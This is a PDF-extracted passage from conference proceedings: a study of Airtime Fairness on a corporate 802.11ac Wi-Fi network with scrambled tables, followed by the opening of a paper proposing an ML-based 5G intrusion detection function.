– Scanning of the current situation on the air is performed at discrete intervals, which somewhat reduces the efficiency of the equipment, but significantly saves the computing resources of the central processor; – The access point performs control of the air utilization in the forward and backward directions. Since the wireless user does not participate in the process of allocating time slots and changing their size, the access point has the ability to control the transmission time in both directions; – To track time and ensure maximum efficiency at the access point, the use of the token method is provided [16]; – The packet receives permission to transfer data in a direct flow from the access point to the user only after confirming the availability of a sufficient number of virtual tokens; – Airtime Fairness does not analyze data packets at any level. The only packet parameter that the technology algorithm operates on is its size (meaning the packet size at the link layer, i.e. the size of the Ethernet frame). The algorithm for obtaining permission at the beginning of data transmission in a direct flow is as follows: 1. Obtaining and analyzing the current channel speed at which the user is working. 2. Obtaining and analyzing information about the size of the data packet being prepared for sending. 3. Calculation of the required time to transmit a packet at a known size and the user’s current channel speed. 4. Comparison of the time required to transmit a frame and the available number of temporary tokens for the current communication session. If the number of temporary tokens is sufficient to transmit the frame, then the frame is sent to the radio module for transmission to the user. If the number of tokens is insufficient to transfer the current packet, it is delayed in the queue until the next cycle of the algorithm to obtain permission to transfer. Based on the information received, we can conclude that the Airtime Fairness technology on Edimax equipment is implemented taking into account the current parameters of the radio channel and the frame size.
2 Study of the Impact of Airtime Fairness Technology on the Example of a Corporate Network The main feature of wireless communication is that the transmission medium is not deterministic both in time and depending on the location. Unlike wired transmission lines, wireless systems continuously take into account a large number of environmental factors. These are a distance between the access point and the user equipment, countless repeated mirroring, interference, external interference, “hidden nodes”, etc. The results of the study will not be identical if any of the environmental parameters change. It is possible to change the accuracy of the results only with the help of statistical methods, such as multiple repetition of the experiment, reproduction of the same parameters and environmental conditions.
Analysis of Airtime Fairness Technology Application
643
2.1 Initial Conditions for Conducting Research The hardware for the study was a corporate wireless network for internal use by company employees. The equipment of Edimax Company was used as access points, namely: corporate-level access points CAP1300. The access point meets all modern requirements for wireless equipment, supports the IEEE 802.11ac Wave 2 standard, MU-MIMO technology and adaptive beamforming technology. However, this technology has been disabled to prevent distortion of the received data due to the operation of proprietary algorithms. The maximum channel rate supported by a 5 GHz wireless system is 867 Mbps. Wireless network management, enabling and disabling wireless options was performed in a centralized manner using a wireless controller. It should be noted that the technology of logical separation of the VLAN network was used to transmit traffic to the router, and distortion of the data obtained as a result of the experiment is almost completely excluded. The switching and accounting of the number and size of packets transmitted over the wireless network was carried out by a stack of Cisco SMB Series SG350X switches. The study was carried out in an office building of the Open Space type, containing furnished premises with an area of 80 square meters or more, in which access points were installed mainly closer to the center of the rectangular areas of the room. It should be noted that during the study, at least 50 users are simultaneously connected to the Wi-Fi network, which are distributed evenly throughout the office and evenly load the network equipment. The most important variable in the network is the user’s devices, which, as they move through the building, consume a random amount of network traffic. The choice of such an environment for conducting research is due to free access to the settings of the information system and all wired and wireless office equipment. A feature of the work is the use of mainly statistical averaged data obtained over a certain period. Research and data collection were conducted on a full-time basis from 9:00 to 18:00 over several days. In the first three days, control information was collected, i.e. those data that are taken into account when analyzing statistical data. In the next three days, information was collected, the analysis of which determined the impact of Airtime Fairness technology on network performance indicators. It should be noted that during working hours the main percentage of the network load is generated by the traffic of terminal users and HTTPS traffic: site visits, background music, training videos, minor file sharing, etc. The values of the parameters of the main settings are shown in Table 1. The methodology for collecting and presenting the results of control measurements is as follows: – Statistical data were collected within six days under the same conditions, with unchanged network settings, with the constant location of equipment and workplaces of employees; – Given that the statistical data for each day are similar and no anomalous data was found, then statistics of only three random days are presented. – To improve the accuracy and reliability of the collected data, each of the days is divided into time intervals of 5, 10, 15, 30 min, an hour, two and three hours, and the distribution of the intervals during the day was random.
644
L. Tokar and Y. Krasnozheniuk Table 1. Values of the main parameters of the wireless network
Parameters
Reference week values Values during next week
Airtime Fairness enabling
−
+
Maximum channel speed in the range of 5 GHz, Mbps
867
867
Real maximum channel throughput for 2x2 400 MIMO with a signal bandwidth of 40 MHz, Mbps
400
The maximum possible data transfer rate over the radio channel for 2x2 MIMO, Mbps
280
280
The maximum possible data transfer rate 140 over the radio channel for 1x2 SIMO, Mbps
140
Beamforming enabling
−
−
IEEE 802.11r, k, v protocol family
+
+
Bandsteering enabling
+
+
Transmitter power, dbm
17
17
– Data collection was carried out in a semi-automatic mode using the software for monitoring network equipment via the Zabbix SNMP protocol with installed templates suitable for each type of equipment. – Data on the size of packets and their number is collected from the root router that terminates the wireless network traffic. – For a better assessment of performance in relation to the type of traffic, and, as a consequence, the size of the packet, differentiation and independent estimation of parameters for three packet sizes were introduced: small (size from 64 to 512 bytes), medium (size from 513 to 1024 bytes) and large (size from 2015 to 1518 bytes) at the link layer. – Data on the utilization of the wireless channel was obtained by monitoring the internal statistics of each of the access points. 2.2 Investigation of System Productivity Without Using Airtime Fairness Technology During the first three s of the study, we collected benchmark network performance statistics with Airtime Fairness turned off to analyze wireless performance metrics. Tables 2, 3 and 4 show performance indicators and arithmetic mean values of channel utilization. Based on the data obtained as a result of the study, the following conclusions can be drawn: – System parameters (number of packets, their size, average traffic for the period) are random variables that are weakly correlated. This is caused by many factors:
Analysis of Airtime Fairness Technology Application
645
Table 2. Performance indicators network in day 1 Day 1
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–9.05
103
225
599
927
8864,8
13,6
9.05–9.15
112
9.15–9.30
124
284
713
1109
10482
16,2
309
744
1177
11166,6
17,51
9.30–10.00
131
345
757
10.00–11.00
118
317
827
1233
11586,7
18,09
1262
12128,3
19,13
11.00–13.00
133
303
750
1186
11128,3
17,45
13.00–16.00
136
275
764
1175
11642,4
18,61
Table 3. Performance indicators network in day 2 Day 2
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–11.00
116
300
780
1196
11926,4
19,26
11.00–11.05
119
11.05–11.15
127
291
763
1173
11575,2
18,69
320
829
1246
12608
20,3
11.15–11.30
134
296
781
1228
12129,6
18,81
11.30–12.00
141
306
827
1262
12128,3
19,13
12.00–13.00
124
272
689
1085
10700,8
16,63
13.00–16.00
143
331
836
1310
12972
19,97
the random value of the traffic generated by each of the users per unit of time, the random type of traffic at any given time. In addition, the number of wireless users of the system is variable and unpredictable; – There is almost no change in the dependences of the average packet performance and average bandwidth for any period. This is due to the inability to predict the type of traffic and, accordingly, the average size of packets that will be generated by a specific user in the forward and backward directions of data transmission; – Some correlation should be noted between packet performance and average speed for the period from 12:30 to 14:00 h daily, taking into account the break in the company. A slight decrease and fluctuations in indicators during this period is due to a break in work processes, but at the same time, there is an increase in user activity on social networks, video hosting, news sites, etc.
646
L. Tokar and Y. Krasnozheniuk Table 4. Performance indicators network in day 3
Day 3
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–10.00
118
319
804
1241
11788,9
18,47
10.00–13.00
120
13.00–13.05
140
283
753
1156
11463,2
17,63
304
665
1099
10208,1
16,03
13.05–13.15 13.15–13.30
138
314
748
1200
11179,4
17,69
151
294
832
1277
12071,4
19,13
13.30–14.00
125
329
712
1166
10784,8
16,74
14.00–16.00
143
311
744
1198
11725,6
18,19
2.3 Investigation of System Productivity Using Airtime Fairness Technology The collection of statistics during the next three days of the study was carried out using the same methodology as during the first three days. Three random days were selected for data analysis: day 4, day 5 and day 6. The only difference in the system settings is the activation of the Airtime Fairness technology algorithms. The collected data are presented in Tables 5, 6, 7. Table 5. Performance indicators network using Airtime Fairness technology in day 4 Day 4
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–10.00
122
299
748
1166
11096,3
14,84
10.00–10.05
138
10.05–10.15
147
309
785
1232
11772,8
16,36
295
823
1165
12140,8
16,86
10.15–10.30 10.30–11.00
130
321
797
1248
12036
17,21
137
323
817
1277
12473,6
17,53
11.00–14.00
130
283
704
1117
10976
14,69
14.00–16.00
136
332
821
1289
12201
16,6
Thus, taking into account the fact that there were no changes in the settings of the wireless equipment, its configuration and location during the study, changes in network performance indicators were revealed during the second week due to the operation of the algorithms of Airtime Fairness technologies. There is an increase in packet performance,
Analysis of Airtime Fairness Technology Application
647
Table 6. Performance indicators network using Airtime Fairness technology in day 5 Day 5
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–11.00
142
324
823
1289
12259,4
16,15
11.00–11.05
153
11.05–11.15
145
377
884
1414
13284
18,64
366
857
1368
12864,5
18,19
11.15–11.30 11.30–12.00
137
355
842
1334
12567
17,65
120
347
810
1277
12073,6
16,54
12.00–13.00
114
351
832
1297
12391,1
16,81
13.00–16.00
145
353
811
1309
12235,4
15,87
Table 7. Performance indicators network using Airtime Fairness technology in day 6 Day 6
Numbers of packets per second, Byte
Total value, pps
Traffic, kbps
Channel utilization, %
Time intervals
64–512
513–1024
1025–1518
9.00–11.00
132
342
878
1352
13376
19,12
11.00–14.00
128
14.00–14.05
122
323
817
1268
12548,8
16,88
289
742
1153
11283,2
16,08
14.05–14.15
144
349
791
1284
11992,9
17,21
14.15–14.30
137
356
853
1346
12766,1
18,29
14.30–15.00
138
320
766
1224
11932,8
16,07
15.00–16.00
128
299
759
1186
11704
15,88
average transmission rate and a decrease in the percentage of channel utilization. This indicates a positive change in the performance of the wireless network.
3 Analysis of Network Bandwidth One of the most important qualitative indicators of a transmission system performance, especially with a random method of accessing the medium, is the bandwidth of user traffic. While Airtime Fairness does not increase the traffic transmitted, bandwidth is an important indicator of the technology’s performance. To improve the accuracy of the research results, a comparison was made between the average daily bandwidth and bandwidth for a selected time. This refers to one hour per
648
L. Tokar and Y. Krasnozheniuk
day, which was divided into short periods of 5, 10, 15 and 30 min. Indicators of traffic transmission speed for each day of the study are shown in Fig. 4.
Fig. 4. Indicators of traffic transmission speed for each day of the study
Based on the methodology for collecting and presenting the results (Sect. 1.4), to analyze changes in wireless performance indicators, it is advisable to use the method of comparing the indicators obtained after the activation of the Airtime Fairness mechanisms with the indicators obtained during the control week for the corresponding periods of time. The change in the average daily bandwidth of the system for the periods with activated Airtime Fairness relative to the control measurements in the first week is represented by the Formula 7: tr = (
CATF · 100 %) − 100. Ccontr
(7)
where CATF is the system performance with activated Airtime Fairness; Ccontr = 1 day +2 day +3 day System performance during the control period. 3 The results of changes in bandwidth values with activated Airtime Fairness compared to the control values for the same periods in the control week are shown in Table 8. The analysis results in the graphs in Fig. 5 and Table 9, which show the average difference in data transfer rates with the enabled Airtime Fairness technology for the studied days. Thus, based on the analysis of the data obtained, we can conclude that the network performance has increased with the included algorithms of the Airtime Fairness technology, which is clearly shown in Fig. 5. The average overall bandwidth over the study period, compared with the data obtained for the control week, increased by 8,78%. However, we should take into account the fact that there were no overloads in the network during the study.
Analysis of Airtime Fairness Technology Application
649
Table 8. The results of changes in bandwidth values with activated Airtime Fairness compared to the control values for the same periods in the control week Data
Average daily bandwidth
5 min
10 min
15 min
30 min
Day 1
+7,4%
+32,8
+15,8%
+7,8%
+7,7%
Day 2
−0,9%
+1,7%
−3,7%
+4,5%
+2,8%
Day 3
+4,4%
+15,3%
+8,6%
−0,3%
+15,7%
Day 1
+13,9%
+49,9%
+22,7%
+12,5%
+4,2%
Day 2
+5,1%
+14,8%
+2%
+9, 1%
−0,5%
Day 3
+10,7%
+30,1%
+15,1%
+4,1%
+12%
Day 1
+11,2%
+27,3%
+14,4%
+14,3%
+3%
Day 2
+2,6%
−2,5%
−4,9%
+13,5%
−1,6%
Day 3
+8,1%
+10,5%
+7,3%
+5,8%
+10,6%
Day 4
Day 5
Day 6
Fig. 5. Average difference in data transfer rates with the enabled Airtime Fairness technology for the studied days
4 Analysis of Errors Probability in Transmission of TCP Traffic When operating a wireless network, compared to any cable system, there is the greatest probability of errors, both channel and interchannel. To combat interference and collisions in the transmission channel, the CSMA/CA algorithm is used [17, 18]. That is why, in addition to bandwidth, an integral indicator of a comprehensive assessment of a data transmission channel is the probability of errors. Since the monitoring of the network operation was carried out at the channel and network levels, it
650
L. Tokar and Y. Krasnozheniuk
Table 9. Data transfer rates with the enabled Airtime Fairness technology for the studied days Data
Average daily bandwidth
5 min
10 min
15 min
30 min
Day 4
+3,63%
+16,6
+6,9%
+4%
+8,73%
Day 5
+9,9%
+31,6%
+13,3%
+9,57%
+5,23%
Day 6
+7,3%
+11,77%
+5,6%
+11,2%
+4%
is only possible to estimate a secondary indicator of the occurrence of an error – the probability of damaged packets. As an expedient and effective method for assessing the probability of damaged packets, the evaluation of TCP traffic was chosen. This choice is conditioned by the greatest sensitivity of TCP traffic to packet loss or damage. The technique for estimating the percentage of TCP segments damaged on a network narrows down to estimating the number of TCP segments retransmitted by end hosts. Requesting and retransmitting a TCP segment clearly indicates damage or loss of one or more data packets related to TCP traffic. The technical ability to count and estimate the number of lost packets is implemented using the packet counter when the “TCP Dup ACK” or “TCP-Retransmission” flags are enabled, which mean the retransmission of data segments. The process of counting the necessary flags is carried out using a TCP traffic sniffer on the root router and a server computer with the Wireshark analyzer of the content and headers of TCP segments installed. In order to optimize and simplify the analysis of the data obtained, only three time intervals of one hour each were considered for each of the study days. In this case, the values of retransmitted TCP packets and the counter of the total number of TCP packets, implemented on the root router, are used. The percentage of TCP packets that were retransmitted over the wireless network is represented by the Formula 8: λ=
Nrep · 100 % Ntotal
(8)
where Nrep - the number of retransmitted TCP packets; Ntotal - the total number of transmitted TCP packets. The results for the percentage of TCP packets that were retransmitted over the wireless network are shown in Table 10. Analyzing Table 10, we can conclude that the percentage of retransmission does not significantly depend on the load. This is due to the relatively low utilization of the channel, rational placement of equipment, almost complete absence of out-of-band interference and, accordingly, the minimum probability of collisions due to hidden node problems. The number of retransmitted packets during the Airtime Fairness period decreased by 7,77% on average compared to the data obtained in the first benchmark week (Fig. 6, Table 11).
Analysis of Airtime Fairness Technology Application
651
Table 10. Percentage of TCP packets that were retransmitted over the wireless network Data
9.00–10.00
12.00–13.00
Day 1
1,43%
1,38%
1,52%
10.00–11.00
13.00–14.00
15.00–16.00
Day 2
1,46%
1,57%
1,51%
9.00–10.00
11.00–12.00
14.00–15.00
Day 3
1,35%
1,61%
1,52%
9.00–10.00
12.00–13.00
13.00–14.00
1,41%
1,34%
1,36%
10.00–11.00
13.00–14.00
15.00–16.00
Day 5
1,33%
1,31%
1,35%
9.00–10.00
11.00–12.00
14.00–15.00
Day 6
1,38%
1,43%
1,41%
Day 4
13.00–14.00
Fig. 6. Analysis of the number of retransmitted TCP packets
Table 11. Analysis of retransmitted TCP packets with the enabled Airtime Fairness technology Data
Day 4
Day 5
Day 6
I time interval
−4,86%
−7,64%
−2,09%
II time interval
−9,27%
−11,92%
−6,62%
III time interval
−8,67%
−11,3%
−6%
652
L. Tokar and Y. Krasnozheniuk
5 Analysis of Wireless Channel Utilization Indicators The main goal of Airtime Fairness technology is to provide all users of the wireless network with fair access to the transmission medium, determined in time. Therefore, for network performance, the initial stage of the analysis is to optimize the operation of user devices on the air and reduce the utilization of the wireless channel by reducing the influence of outdated and slow devices. That is why, in addition to assessing the packet performance and the probability of damaged packets, it is advisable to analyze the utilization of the radio channel in order to maximize the impact of the Airtime Fairness technology mechanism on all aspects of the wireless network that can be measured by any indirect method (in the absence of interference with the physical layer of the system transmission). Since the percentage of utilization mainly depends on the packet and bit performance of the system, it is advisable to analyze the utilization of air, taking into account the current packet and bit performance [19]. Based on the data shown in Tables 2, 3, 4, 5, 6 and 7, the air utilization rate depends on the system performance indicators. But it is impossible to single out a clear dependence, since the utilization rates are influenced by a large number of factors, including third-party ones, i.e., those that are not directly related to the system under study. These are, for example, interference from the LTE network [20], weather radars, variable interference, complex indicators, reflections of our own signal or from user devices (support for MU-MIMO technologies, fast roaming technologies in 802.11 k/r/v standards [21] etc.). Since it is impossible to eliminate additional factors that can change the rate of air utilization, it would be better to neglect them. Table 12 shows the average values of the utilization rate depending on the network performance for each of the days. Table 12. Average values of the utilization rate depending on the network performance for each of the days Data
Numbers of packets per second, pps
Traffic, kbps
Channel utilization, %
Day 1
1152,7
10999,9
17,22
Day 2
1200,1
11919
18,77
Day 3
1191
11317,3
17,7
Day 4
1213,43
11813,8
16,3
Day 5
1326,86
12525
17,12
Day 6
1259
12230
17,08
Calculations of average daily values were carried out on the basis of data from Tables 2–7 according to the Formula 9. Nmax =
Nadd · 100 % Bmax
(9)
Analysis of Airtime Fairness Technology Application
653
+...+N15.00−16.00 Nadd = N9.00−10.00 +N10.00−11.00 - the total number of transmitted TCP Nperiod packets for the selected periods; Nperiod average daily packet performance for the selected period; Bmax maximum theoretical value of productivity at 100% air utilization. Since the main indicator of the transmission system utilization is the utilization of the wireless channel, then for a qualitative assessment of the influence of the Airtime Fairness technology on the system performance, it will be advisable to determine the maximum theoretical value of the system performance at the current value of the channel utilization for each of the performance parameters (Fig. 7).
Fig. 7. Performance indicators of the wireless network are determined, assuming 100% channel utilization
Thus, using the Table of performance and utilization indicators, the theoretical maximum performance indicators of the wireless network are determined, assuming 100% channel utilization.
6 Conclusions The influence of the Airtime Fairness technology on the performance and quality of the wireless Wi-Fi network of the IEEE 802.11ac standard is investigated. Based on the calculations and analysis of the data obtained as a result of the study, the positive effect of the mechanisms of the Airtime Fairness technology on the performance of the network has been proven. In order to comprehensively investigate the impact of Airtime Fairness technology, the paper presents an analysis of three main indicators of performance and quality of a wireless network. Compared to the reference week, the average daily increase in the traffic transfer rate was 8,78%. Along with the performance improvement in terms of speed, the percentage of damaged TCP traffic packets along the user-to-root router path decreased by 7,7%. Airtime Fairness algorithms optimized airtime utilization, which in turn increased the theoretical maximum performance at 100% air utilization by 13,6% for traffic rate and 13,88% for packets per second. However, a corporate network built in accordance with all modern requirements and standards is not a perfect example of all the possibilities and potential of the Airtime Fairness technology algorithms, and the results obtained are far from theoretically expected.
654
L. Tokar and Y. Krasnozheniuk
This is primarily caused by the redundancy of network resources. Secondly, this is due to the relative constancy of users and the provision of sufficiently high signal levels on the equipment of users to operate at channel speeds close to the maximum. Third, the basis for the study was a network that operates using the IEEE 802.11ac standard, which is the latest and fastest common standard. That is why the influence of technology algorithms on the overall network performance is tens of percent. It has been proven that the use of Airtime Fairness technology is advisable in a classic corporate wireless network with a reduced coverage radius of one access point due to power control. The Airtime Fairness technology will definitely work in HotSpot networks, which are built and operated according to the principles of maximum differentiation of user devices and limiting the speed of Internet access. Today’s users and users with a high signal-to-noise ratio will receive the highest possible quality of service. The problems of remote users, as well as users with outdated equipment are solved by increasing the density of wireless network equipment. In addition, one of the key issues is the approximate or actual number of users on the network. In situations where a single AP serves 20 or more users, Airtime Fairness technology will allow them to work as efficiently as possible, despite the differences in the characteristics of the devices used. The impact of Airtime Fairness technology, taking into account the unloaded network, indicates a significant optimization of the processes of distributing airtime between different users and proves its effectiveness.
References 1. Sanabria-Russo, L., Barcelo, J., Bellalta, B., Gringoli, F.: A high efficiency MAC protocol for WLANs: providing fairness in dense scenarios. IEEE/ACM Trans. Netw. 25(1), 492–505 (2017) 2. Lei, J., Tao, J., Huang, J., Xia, Y.: A Differentiated Reservation MAC Protocol for Achieving Fairness and Efficiency in Multi-rate IEEE 802.11 WLANs, vol. 7, pp. 12133–12145 (2019). https://doi.org/10.1109/ACCESS.2019.2892760 3. Fang, Y., Doray, B., Issa, O.: A practical air time control strategy for Wi-Fi in diverse environment. In: Proceedings of the 2017 IEEE Wireless Communications and Networking Conference Workshops (WCNCW), pp. 1–6, San Francisco, CA, USA (2017). https://doi.org/10. 1109/wcncw.2017.7919116 4. Høiland-Jørgensen, T., Kazior, M., Täht, D., Hurtig, P., Brunström, A.: Ending the anomaly: achieving low latency and airtime fairness in WiFi. In: USENIX Annual Technical Conference, Santa Clara, CA, USA, pp. 139–151 (2017) 5. Yu, S.I., Park, C.Y.: Responsible airtime approach for true time-based fairness in multi-rate WiFi networks. Sensors 18(11), 1–19 (2018). https://doi.org/10.3390/s18113658 6. Mao, Z., Jiang, Y., Di, X., Woldeyohannes, Y.: Joint head selection and airtime allocation for data dissemination in mobile social networks. Comput. Netw. 166, 1–15 (2019). https://doi. org/10.1016/j.comnet.2019.106990 7. Ayatollahi, H., Tapparello, C., Heinzelman, W.: MAC-LEAP: multi-antenna, cross layer, energy adaptive protocol. Ad Hoc Netw. 83, 91–110 (2019). https://doi.org/10.1016/j.adhoc. 2018.09.005 8. Wang, J., Lang, P., Zhu, J., Deng, W., Shaoqing, X.: Application-value-awareness cross-layer MAC cooperative game for vehicular networks. Veh. Commun. 13, 27–37 (2018). https://doi. org/10.1016/j.vehcom.2018.04.001
Analysis of Airtime Fairness Technology Application
655
9. Harkat, Y., Amrouche, A., Mohand, E.-S., Kechadid, T.: Modeling and performance analysis of the IEEE 802.11p EDCA mechanism for VANET under saturation traffic conditions and error-prone channel. Int. J. Electron. Commun. (AEU) 101, 33–43 (2019). https://doi.org/10. 1016/j.aeue.2019.01.014 10. Denisov, D.: Technology Review Wi-Fi (2019) 11. Vikulov, A.S., Paramonov, A.I.: Introduction to Wi-Fi networks with high user density. Inf. Technol. Telecommun. 6(1), 12–20 (2018) 12. Chernega, V.S.: Estimation of the real capacity of computer Wi-Fi networks at transportation level. Tavricheskiy Sci. Obs. 3(20), 119–128 (2017) 13. Vikulov, A.S., Paramonov, A.I.: Frequency-territorial planning of Wi-Fi networks with high user density. Inf. Technol. Telecommun. 6(2), 35–48 (2018) 14. Tarasyuk, O., Gorbenko, A.: Performance enhancement in multirate Wi-Fi networks. J. Inf. Control Manag. Syst. 12(2), 141–152 (2014) 15. Zakharov, Y.: Are you ready to switch to wave 2? J. Netw. Solut. LAN Open Syst. Publ. House 11, 28–34 (2017) 16. Du, D., Zhang, C., Wang, H., Li, X., Hu, H., Yang, T.: Stability analysis of token-based wireless networked control systems under deception attacks. Inf. Sci. 1–30 (2018). https:// doi.org/10.1016/j.ins.2018.04.085 17. Yen, L., Adege, A.B., Lin, H.-P., Ho, C.-H., Lever, K.: Deep learning approach on channel selection strategy for minimizing co-hannel interference in unlicensed channels. Microelectron. Reliab. 105, 1–12 (2020). https://doi.org/10.1016/j.microrel.2019.113558 18. El-Jaafreh, Y.G.: Co-channel and adjacent channel interference calculations in cellular. Commun. Syst. J. King Saud Univ. Eng. Sci. 12(1), 153–167 (2000). https://doi.org/10.1016/ S1018-3639(18)30711-6 19. Iqbal, S., Abdullah, A.H., Qureshi, K.N.: Channel quality and utilization metric for interference estimation in wireless. Mesh Netw. Comput. Electr. Eng. 64, 420–435 (2017). https:// doi.org/10.1016/j.compeleceng.2017.10.003 20. Baswade, A.M., Atif, T.A., ReddyTamma, B., Franklin, A.: A Novel coexistence scheme for IEEE 802.11 for user fairness and efficient spectrum utilization in the presence of LTE-U. Comput. Netw. 139, 1–18 (2018). https://doi.org/10.1016/j.comnet.2018.04.002 21. Moura, H., Alves, A.R., Borges, J.R.A., Macedo, D.F., Vieira, M.A.M.: Ethanol: a softwaredefined wireless networking architecture for IEEE 802.11. Netw. Comput. Commun. 149, 176–188 (2020). https://doi.org/10.1016/j.comcom.2019.10.010
5G Security Function and Its Testing Environment Maksim Iavich1 , Sergiy Gnatyuk2 , Giorgi Iashvili1(B) , Roman Odarchenko2 , and Sergei Simonov3 1 Caucasus University, Tbilisi, Georgia
[email protected] 2 National Aviation University, Kyiv, Ukraine 3 Scientific Cyber Security Association, Tbilisi, Georgia
Abstract. The data that is sent through wireless networks is quickly increasing and depends upon many factors. The most important among them is the tremendous growth in multimedia applications on mobile devices, which includes among other use cases, streaming music and video data, two-way video conferencing and social networking. The telecommunications industry is currently undergoing significant changes in order to transition to 5G networks, which will better serve existing and emerging use cases. In 2020, the world consumed approximately three trillion minutes of Internet video per month, which is equivalent to five million years of video or one million video minutes per second. This underscores the need to upgrade from 4G to 5G in order to meet customer demands for better quality of service and enhanced data transmission security to ensure stable and secure communication. The deployment of 5G services will require novel storage and processing technologies to support new networking models and efficient service deployment. However, once these technologies are in place, new problems will arise for cybersecurity of 5G systems and their functionality. 5G security is being assessed by researchers who have found that it still presents some security risks. These concerns arise from various reasons, including recent discoveries of vulnerabilities in 5G security systems. Attackers have been able to inject malicious code into the system and execute undesirable actions through attacks such as MNmap, MiTM, and Battery drain. To provide the highest levels of cybersecurity, new architectures for 5G and beyond networks should include novel AI/ML based algorithms. This paper examines the existing vulnerabilities of the 5G ecosystem and proposes a new cybersecurity function that considers machine learning algorithms. The function integrates Firewall, Intrusion Detection, and Intrusion Protection systems into an existing 5G architecture. The paper focuses on the Intrusion Detection System (IDS) and its methodology for identifying attacks such as MNmap, MiTM, and Battery drain. It also provides pseudo code for the algorithmic core and evaluates the efficiency of this approach. A test laboratory is created using a server and fifty raspberry pi hardware systems to simulate attacks on the server. The paper suggests an improvement strategy that will be implemented in future versions of the system. Keywords: 5G · Security function · 5G security · Testing environment
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 656–678, 2023. https://doi.org/10.1007/978-3-031-35467-0_39
5G Security Function and Its Testing Environment
657
1 Introduction As wireless networks handle an ever-increasing volume of traffic due to the proliferation of mobile devices, including the Internet of Things (IoT), the telecommunications industry is transitioning to 5G networks to meet the demands of emerging use cases. 5G networks promise high data rates, wider coverage, better Quality of Service (QoS), and ultra-low latency. However, this vision of 5G also presents unique challenges that require the development of novel networking architectures, service deployment models, and storage and processing technologies. These new technologies also pose challenges for 5G cybersecurity systems, necessitating their definition and development. One of the critical aspects of 5G security is the connection of critical infrastructures, which underscores the need to prioritize security to ensure the safety of society as a whole. For instance, a security breach in the online power supply system could have catastrophic consequences for the entire spectrum of electrical and electronic systems that society relies upon. Hence, it is imperative to thoroughly investigate and highlight the significant security challenges in 5G networks and provide an overview of potential solutions that can guide the design of secure 5G systems. Researchers and developers are diligently working towards securing 5G systems, and it is crucial to analyze the differences between 4G and 5G networks’ security. With the increasing reliance on 5G technology, addressing cybersecurity concerns is paramount to safeguarding the integrity and resilience of the networks and the systems they connect. Very often that new security problems arise along with new technological advancements. Even with the deployment of 5G technology, attacks such as man-in-the-middle, DoS and DDoS attacks, and application layer attacks and spoofing that have been common since the inception of the internet, remain possible. Modern technologies like 5G do not eliminate the possibility of such attacks.
2 Review on the Security Problems of the 5G Standard According to recent research, 5G networks still have security problems, as highlighted in this paper. The following security issues have been identified: 1. 5G networks are more susceptible to software attacks due to their reliance on software configurations. Hackers can exploit security bugs and flaws to compromise the network’s operation. 2. The architecture of 5G networks offers novel functionalities that make some functions and parts of the network equipment much more sensitive to attacks of hackers. Base stations and network key management functions are particularly vulnerable. 3. Mobile network operators depend on suppliers; this fact enhances the probability of the attacks and increases the impact of the attacks. 4. The major part of critical IT applications will have to use the 5G network, making them vulnerable to attacks concerning their availability and integrity. 5. The sheer number of devices that will be integrated into the 5G network has the potential to trigger various types of denial-of-service (DoS) and distributed denialof-service (DDoS) attacks.
658
M. Iavich et al.
6. The use of network slicing, a technique employed in 5G networks that permits the creation of multiple virtual networks within a single physical network, can potentially pose security threats if hackers manage to force a device to utilize a slice not intended for it. Recent research has brought to light vulnerabilities in 5G security systems, which enable attackers to inject malicious code into the system and carry out unauthorized actions. These attacks can be classified into several categories. Some researchers have identified security vulnerabilities in 5G networks that could allow attackers to conduct various types of attacks. One such attack is MNmap, in which researchers were able to sniff out information transmitted in plaintext and recreate a map of the connected devices. They could identify the model, manufacturer, version of the devices, operating system, and the type of device. Another type of attack is Man-in-themiddle (MiTM), which can lead to bidding-down and battery drain attacks. In a MiTM attack, attackers can remove the MIMO enablement, a feature that significantly boosts the data transfer speed over the 5G network. The battery drain attack is targeted towards NB-IoT devices, where an attacker modifies PSM, leading to continuous activity and searching for a network to connect to. This drains the battery power even in energysaving mode and may allow attackers to propose desirable networks to the potential victim and use the hardware maliciously. It is crucial to emphasize the need for a new architecture for 5G and future networks to incorporate AI/ML algorithms that can provide robust cybersecurity measures to safeguard mobile subscribers, industries, and governments. Based on the research presented in this research, and we can conclude that 5G networks are susceptible to DoS, Probe and software-based attacks. To address these vulnerabilities, an intrusion detection system (IDS) has been developed using machine learning algorithms.
3 The Offered Approach Our proposal involves the integration of a cyber security function into every 5G station as a separate server, which will include both a firewall and an IDS/IPS. A visual representation of the offered approach can be found in Fig. 1. It is important to highlight that our approach to resist these types of attacks relies on the use of distinct datasets for the process of training. The first one is NSL-KDD, which is widely recognized and commonly employed in the researched and for creating the prototypes of intrusion detection systems. As such, NSL-KDD is the most prevalent dataset utilized for calibrating anomaly detection systems. 3.1 NSL-KDD Dataset and DOS/DDOS2021 Dataset The NSL-KDD dataset is derived from the data collected during the DARPA’98 IDS evaluation program. It encompasses approximately 4 gigabytes of raw tcpdump data obtained from capturing network traffic over a period of seven weeks (11–14). Within this dataset, the two-week duration subset comprises roughly two million connection
5G Security Function and Its Testing Environment
659
Fig. 1. The cyber security module
records. Additionally, the complete dataset consists of roughly 5 million labeled samples, classified as either attack or not. The attacks are classified into four fundamental groups: 1. Denial of Service (DoS) Attacks: the attacker sends many requests and as the result the computer can not process the legitimates users’ requests. 2. User to Root (U2R) Attacks involve an intruder gaining access to legitimate user account data (through methods such as sniffing or social engineering) and exploiting vulnerabilities within the system to attain full access. 3. Remote to Local (R2L) Attacks: the hacker does not have an access to account on the machine, but he can to send packets remotely for gaining the user access on the local machine. 4. Probing Attacks: these attacks are used in order to collect the data about networks in order to bypass their protection mechanisms. The NSL-KDD dataset is split into training and test parts, consisting of twentyfour and fourteen entities, respectively. The features within the dataset are grouped into three categories: basic, traffic, and content features. Basic features include information gathered from TCP/IP connections, which can lead to delays during detection. Traffic features are divided into “Same host” and “Same service” groups, which calculate statistics related to protocol and service behavior. Content features focus on detecting Probing and DoS attacks that need multiple connections in a short interval, while U2R and R2L attacks only require one connection. The NSL-KDD 